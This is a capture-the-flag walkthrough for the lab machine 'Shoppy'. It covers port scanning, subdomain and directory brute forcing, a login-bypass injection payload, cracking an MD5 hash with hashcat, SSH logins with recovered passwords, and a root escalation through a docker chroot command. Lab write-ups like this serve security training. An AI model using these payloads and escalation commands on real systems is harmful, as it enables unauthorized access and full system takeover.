CTF Shoppy

  1. Rustscan
  2. /etc/hosts
  3. Port 80
    1. Subdomain listing
    2. Gobuster
    3. Login page
    4. Bypass auth login page
    5. Search for user
    6. Crack the password
  4. Mattermost
  5. jaeger
  6. deploy

Rustscan

rustscan -a 10.10.11.180

Output:

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
9093/tcp open  copycat syn-ack

/etc/hosts

echo "10.10.11.180 shoppy.htb" >> /etc/hosts

Port 80

Subdomain listing

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hw 9000 --sc 200 

Add mattermost.shoppy.htb to /etc/hosts

Gobuster

gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard

Output:

/images               (Status: 301) [Size: 179] [--> /images/]
/login                (Status: 200) [Size: 1074]              
/admin                (Status: 302) [Size: 28] [--> /login]   
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/Login                (Status: 200) [Size: 1074]              
/js                   (Status: 301) [Size: 171] [--> /js/]    
/fonts                (Status: 301) [Size: 177] [--> /fonts/] 
/Admin                (Status: 302) [Size: 28] [--> /login]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/LogIn                (Status: 200) [Size: 1074]               
/LOGIN                (Status: 200) [Size: 1074]         

Login page

http://shoppy.htb/login

You can bypass the login page.
I will use Burp Suite to intercept the traffic.

While I was playing with Burp Suite I got an interesting error:

We have a username, jaeger:
/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js

Bypass auth login page

When I put a ', the page takes more time to load.
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
From this list I took '||'2 and added admin at the beginning.

Searsh for user

I have to search for a user; it's not working with jaeger.

I enter '||'2 to find a new user, josh.

Crack the password

This is a hash, probably MD5.
6ebcea65320589ca4f2f1ce039975995
https://www.dcode.fr/cipher-identifier

echo "6ebcea65320589ca4f2f1ce039975995" > hash
hashcat -m 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

remembermethisway

Mattermost

http://mattermost.shoppy.htb/login

jaeger is a Linux user; I saw him in the error with Burp Suite.
Let's use SSH.

jaeger

ssh jaeger@shoppy.htb

sudo -l

sudo -u deploy /home/deploy/password-manager

I don't have the password. If I use strings I see nothing, but with cat it's working.

Sample

deploy

ssh deploy@shoppy.htb

Deploying@pp!
I’m using lse again.

I can use Docker; I can also exploit it with GTFOBins.
https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

I’m root